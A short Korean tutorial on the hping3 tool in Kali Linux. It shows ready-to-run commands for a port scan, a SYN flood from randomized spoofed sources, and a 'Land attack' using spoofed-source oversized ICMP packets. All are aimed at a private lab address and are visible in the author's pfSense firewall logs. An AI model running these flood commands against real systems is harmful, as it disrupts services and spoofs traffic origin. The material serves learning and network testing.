hping3 은 네트워크에 존재하는 서버, pc,네트워크 장비등에 ping 명령어 보다 다양한 기능을 제공하는 명령어 이다.
기본적은 kali linux에는 자동으로 설치되어 있으며, 대표적인 기능으로는 port scan, syn flood 공격 등등을 할 수 있다.
사용법
기본적으로 hping3 –help를 이용하면 사용법(usage)부터 각종 옵션들까지 확인할 수 있다.
usage: hping3 host [options]
예시(포트스캔)
hping3 –scan 1-1000 -S 192.168.1.200
타겟 ip(192.168.1.200)의 1 ~ 1000번까지 사용하는 포트가있는지 체크
테스트를 위해 열어둔 80번 포트만 탐지되었다. 이걸 기반으로 ddos공격을 해보겠다.
예시(synflood 공격[DDOS])
hping3 –rand-source 192.168.1.200 -p 80 -S –flood -c 100
랜덤 ip(source)에서 타겟의 IP(192.168.1.200)의 80번 포트로 Syn Flood 공격을 100개의 패킷만 하는것이다.
나는 pfsense 방화벽을 내부네트워크에 구축해서 사용하고있기 때문에 방화벽 alert로그에서 확인이 된다.
예시(LandAttack)
LandAttack은 타겟 IP와 source IP를 동일 하게 함으로써 어디서 공격이들어왔는지 변조하는 공격이다
hping3 -1 -a 192.168.1.200 -d 65000 192.168.1.200 -c 100
타겟(192.168.1.200)으로 source ip(-a 192.168.1.200)가 icmp(-1옵션) 65000패킷사이즈(-d 65000)로 공격을 100개의 패킷만 하는것이다.